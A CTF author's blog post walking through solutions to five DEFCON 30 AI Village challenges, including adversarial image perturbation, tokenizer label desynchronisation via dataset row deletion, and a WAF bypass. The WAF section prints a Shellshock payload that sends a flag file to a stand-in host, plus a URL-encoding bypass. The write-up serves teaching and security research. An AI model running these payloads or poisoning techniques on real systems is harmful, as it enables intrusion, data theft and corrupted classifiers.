0-Days and Tokens and Salts, Oh My! (An overview of my DEFCON AIV CTF Challenges)
--
I wrote 5 CTF challenges for the Defcon 30 AI Village Capture The Flag, I thought I would write a blog post to talk about the solutions and inner workings of the challenges, especially WAF and Token, as these were radically different techniques to the majority of the CTF and seemed to take a lot of the community by surprise. Part of which was definitely due to these challenges having the source code hidden.
Context
For Defcon 30, the AI Village organized an AI Capture The Flag competition hosted on Kaggle. The goals of a CTF are usually to hack/break a system to uncover a hidden flag somewhere within the system. For the AI CTF, the goals were generally less focused on vulnerabilities and more on adversarial samples and model poisoning. The competition ran between the 12th of August and the 12th of September 2022. It ended up with 3,555 individuals joining the competition, with 668 participants making a submission. Kaggle also put up $25,000 in prizes which was incredible.
Whoami
I’m JankhJankh, I’m a Penetration Tester from Aus where I specialize in red teaming and infrastructure level web attacks. AI hacking research has been my hobby for a few years now, I’ve given a talk and ran a workshop on pentesting ML with a goal of helping to build maturity
My ML background comes from my engineering degree, where I did my honours in developing Multimodal Neural Networks for textile identification to automate clothing recycling.
My Challenges
I provided the the following challenges for the DEFCON 30 AI Village CTF:
- Forensics
- Theft
- Salt
- WAF
- Token
These challenges were part of a workshop I ran in Australia earlier in the year. This workshop was white-box, with each user being provided all source code for the challenges other than flags and major spoilers.
The entire workshop is now available online if you would like to try the remaining 10 or so challenges. Which I highly reccomend as they contain a number of challenges that were difficult to make multi-player, such as dataset poisoning and code execution challenges.
https://github.com/JankhJankh/aictf
PS, I wrote a lot of these challenges in the early days of covid, so a lot of libraries are out of date. Luckily the docker container in the repository will handle that all for you.
FORENSICS
While you can do this by just running strings on the file and grepping for a flag, the goal was to give intro level people a flag for just loading a model and looking at what it has inside it.
import tensorflow as tf
model = tf.keras.models.load_model(‘./forensics.h5’)
model.get_config()
THEFT
This challenge was initially built as a web app so users have to retrieve the encrypted model and then decrypt the model to retrieve the pickle file from within it (It’s AES-CBC with a password in rockyou). The server also returns confidences so you can just do an online attack rather than an offline attack if you want to circumvent the decryption stage.
Once you have the model, the sample exploit code provided (https://tcode2k16.github.io/blog/posts/picoctf-2018-writeup/general-skills/#solution-20) gets you 90% of the way there, just change the class names and class IDs.
#Changed lines of code changed from the starting code are:
TURTLE_IDX = 33
TURTLE_STR = “loggerhead”
if __name__ == “__main__”:
create_img(“./owl.jpg”, “./owl_turtle.png”, “./model.h5”, TURTLE_STR, TURTLE_IDX)
assert is_similar_img(“./owl.jpg”, “./owl_turtle.png”)
The full solution code can be found here:
https://github.com/JankhJankh/aictf/blob/main/Solution%20Scripts/theft123/other.py
Executing this script will slighly modify the image, as seen below.
SALT
The secret sauce on SALT is that the randomness added to each image is reasonably small, just big enough to break most solutions to Theft. By cranking up the randomness you can make your changes outperform the random changes the application makes.
#Changed lines of code changed from the starting code are the same as theft except the line in bold which has been changed from -10, 10 to -1, 1
OWL_IDX = 24
OWL_STR = “great_grey_owl”while cost < 0.99:
cost, gradients = grab_cost_and_gradients_from_model([hacked_image, 0])
hacked_image += np.sign(gradients) * learning_rate
hacked_image = np.clip(hacked_image, max_change_below,max_change_above)
hacked_image = np.clip(hacked_image, -10.0, 10.0)
print(“Model’s predicted likelihood that the image is a “+target_str+”: {:.8}%”.format(cost * 100))hacked_image = hacked_image.reshape((224,224,3))
img = array_to_img(hacked_image)
img.save(img_res_path)if __name__ == “__main__”:
create_img(“./turtle.jpg”, “./turtle_owl.png”, “./model.h5”, OWL_STR, OWL_IDX)
assert is_similar_img(“./turtle.jpg”, “./turtle_owl.png”)
Executing this script will slighly modify the image, as seen below.
You can also beat this by doing any kind of adversarial technique that is stronger than the salt used to prevent adversarial attacks, as a whole it’s pretty tough to balance model accuracy and any kind of salting defence.
THEFT AND SALT
Combining the solutions to Theft and Salt leaves you with one of my all time favourite tables:
If you liked these two challenges, the workshop has 4 more of these challenges, two about extracting the models and two with different salting techniques to bypass.
TOKEN
Token was originally designed to be an white-box CTF challenge, with participants being given the source code. This challenge is based off of a bug I found in another challenge of mine while making it.
The solution requires no brute force, however if you haven’t messed around with Tokenizers, a little targeted brute forcing could help. To anyone who decided to brute force all ~3 million combinations to get the solution, I hope you will find the real solution enlightening. Also you probably owe Joe and Moo a drink for all the times you overloaded that host.
The goal of this challenge is simple. A server uses a sentiment analysis model to classify the word SECRETKEY. This model has been trained on a wordlist which you are provided, and you can tell the server to remove two lines from this wordlist before the model uses it to classify the word SECRETKEY.
Before we discuss this challenge, it is important to discuss what a tokenizer is, both categorically, and the specific python implementation. Every classification model has a step somewhere in its implementation, where a labeling function is used to replace class ID with the human understandable version. For example, CIFAR 10 has 10 classes, each with an ID between 0–9 (or 1–10 if you are cursed to still use MATLAB). At some point, Class 0 must be converted to the word “airplane” such that humans can interpret the results of classification. This step is absolutely vital to the process, as swapping classes 0 and 1 will lead to consistently poisoned results between the two classes. Additionally, this step often takes place outside the model itself, and lacks the scrutiny the remainder of the model receives.
This labeling process changes drastically from implementation to implementation. The tokenizer is the python text labeling function that takes a dataset and returns a dictionary of every word used in the dataset with a corresponding class ID.
As you can probably tell from my heavily handed infodump, the goal is to swap the label of SECRETKEY with something else. But how is this possible? Tokenizers return consistent results when used, such that if two people use a tokenizer on the same dataset, the words will be labeled in the same order, we can have a look at this by viewing the tokenizer for the provided CSV.
As you can see, secretkey is at class 4, meaning we would likely need to swap it with class 3 or class 5. By either reading the documentation, or having a look in the CSV, you can identify that these classes are chosen by the frequency of the word appearing in the dataset. With “the” appearing 408 times, “I” appearing 320 times, “blank” appearing 220 times, “secretkey” appearing 216 times, and “and” appearing 195 times. As the number of occurrences of “blank” and “secretkey” are only 4 apart, if you could remove 4 occurrences of the word BLANK, both would have 216 occurrences, the only two rows in the dataset that this occurs for are 337 and 493. Deleting these two rows and running the tokenizer again we can see that the labels for “blank” and “secretkey” have swapped. As both words have the same frequency, the first word encountered is given precedence*.
*To the best of my knowledge, I struggled to find documentation on this exact feature.
However, submitting numbers 337 and 493 are unsuccessful. This is due to the CSV having a header row.
As this CSV has a header row, these values are both off by one, leading to the final two CSV indexes of 336 and 492 to get the flag.
These two numbers should be the only numbers that can synchronize the label successfully.
In case anyone was wondering if the server just looks for these numbers, I can assure you the server is actually doing these calculations everytime. You can download a copy of the challenge from the workshop and try it for yourself if you would like to see the magic in action.
When first discovered, I described this vulnerability as a Tokenizer Desynchronisation, and most people seem to be happy with that vulnerability description, however, it can be applied to other labeling layers and processes, whether they are internal to the model or not. So a more appropriate name may be Label Desynchronisation. If you know of any stories or vulnerabilities where the labeling function itself was targeted, please send me a message as I am aiming to collect a list of real-world vulnerabilities against this under-scrutinized pillar of the classification model ecosystem.
WAF
As discussed in the challenge, a model has been trained to identify an 0-Day vulnerability. The goal of the challenge was to identify the payload the Web Application Firewall(WAF) is built to block, and then bypass this WAF.
On the backend I used a very simple sentiment analysis model with the malicious payload inside it, such that it will block the request if a known malicious portion is visible.
We provided a sample base 64 encoded malicious request to get people started:
mFzaC==
As many people throughout the CTF raised, this starting payload looks like nonsense.
However, this was actually meant as a way to guide the tester towards the correct solution. By prepending any base-64 character to the start of this string, you will get something far more legible.
amFzaC== -> jash
gmFzaC== -> .ash
If testers were familiar with “bash” this might lead them to attempt “YmFzaA==” which is also blocked by the WAF. Whereas any other character would not be blocked (As the model is only trained to block one specific payload).
Note, if players lacked this intuition to try the word bash. This conclusion can also be arrived at by trying various modifications of the starting string. As the hint provided tells players that strings are assessed in blocks of 5, you can make any change to this starting string and it will no longer be blocked by the WAF.
Once a player has identified that they can view malicious/non-malicious strings, they can then submit payloads of 4 known malicious characters and one test character. As the model tests strings in sets of 5, the entire base-64 keyspace can be tested in a single request.
As the model will stop upon the first occurrence of a malicious string, you can pull out the final result and that will be the malicious character:
As we now have a technique for identifying the malicious characters one at a time, we can loop this request until we no longer find a malicious character:
This slowly builds out the final payload:
?addenv=KCkgeyA6O307IC9iaW4vYmFzaC==
This payload does not work out of the box, as you can see, the base64 parameter is the only part of the string that the model was trained on. If you submit this entire string, the server will not be able to base64 decode it. And if you submit the base64 encoded string as is, the WAF will block it, as it is trained to do that.
The payload in question is Shellshock, a classic payload from back in the day.
To avoid mucking around with RCE and risk players DOSsing each other, deleting the flag, and other such nonsense, I decided instead to give the flag to any player who sent me this shellshock payload. Note, any payload that included this string would also work, I didn’t want to punish people for trying RCE. For example the following payload would also return the flag to the player as it contained the test string.
() { :;}; /bin/bash curl http://evil.internal/+`cat flag.txt`
If anyone would like to try the RCE version of this challenge, it and the rest of my challenges are available at https://github.com/JankhJankh/aictf
As mentioned, the WAF will block the exact payload required for the flag. So the additional step of WAF bypass is required. Like all WAFs, there are a number of ways to bypass this WAF, the most common technique I find success in as a pentester is URL encoding. Simply encoding each character such that a WAF will read a parameter in a different context to the final server. The following strings are functionally equivalent when viewed by a Flask web application, however, the WAF is not trained to block the latter.
YmFzaC==
%59%6d%46%7a%61%43%3d%3d
By URL encoding the entire payload, we can bypass the WAF and get the flag.
To conclude, this challenge aimed to teach penetration testers the logic flows to consider when looking at an AI model, the hacking required is also introductory enough that I think data scientists get most of it with a bit of googling.
If you would like to see a younger version of me theorize this style of attack well before I made my AI CTF, here is a link to my Intro to Penetration Testing ML talk.
https://www.youtube.com/watch?v=lcn_yFmz7h8&t=3s
Conclusion
The CTF went incredibly smoothly for the first time the AI Village has ever ran one, and a lot of infrastructure was set up that will make future CTFs run a lot smoother.
Thanks for reading. If you have any feedback or want to chat about my challenges. You can find me at:
- https://twitter.com/JankhJankh
- https://github.com/JankhJankh
- The AI Village Discord
Special shoutouts to @moo_hax and @josephtlucas for putting in an incredible amount of work getting the CTF up to an incredible standard, and for keeping WAF and Token alive despite the immense amount of brute forcing these challenges copped during the competition.
Shoutouts to the other awesome folks who made challenges for the ctf:
@GTKlondike
@rharang
@comathematician
@ColdwaterQ
@BenevOrang
And a final shoutout to Kaggle for hosting the CTF and putting up 25k in prizes.